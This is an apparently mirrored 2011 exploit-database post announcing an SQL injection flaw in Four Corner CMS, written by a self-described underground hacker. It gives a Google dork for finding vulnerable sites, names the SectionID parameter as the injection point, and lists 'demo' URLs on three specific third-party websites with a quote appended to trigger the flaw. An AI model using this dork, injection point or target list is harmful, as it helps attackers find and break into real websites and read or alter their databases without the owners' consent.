id: 17199
date: 10/29/2011
title: Four Corner CMS SQL Injection Vulnerability
author: Mr.XHat
cves: 

# Name: Four Corner CMS SQL Injection Vulnerability
# Google Dork: inurl:Default.asp?SectionID=
# Type: ASP
# Web Site: http://www.4corner.af/
# Data: 2011/08/07
# Author: Mr.XHat
# Discovered By: Mr.XHat
# Tested On: Windows Server 2003
################################

# Exploit:

http://localhost/Default.asp?SectionID=[SQLI]

# Demo:

http://www.4corner.af/Default.asp?SectionID=15'
http://www.lorilins.com/Default.asp?SectionID=7'
http://abidakmal.com/s/Default.asp?SectionID=104'
#################################################

Special Thanks To: #BHG Security Center And All Underground Hackers

Home: http://black-hg.org/cc/



#  0day.today [2023-03-22]  #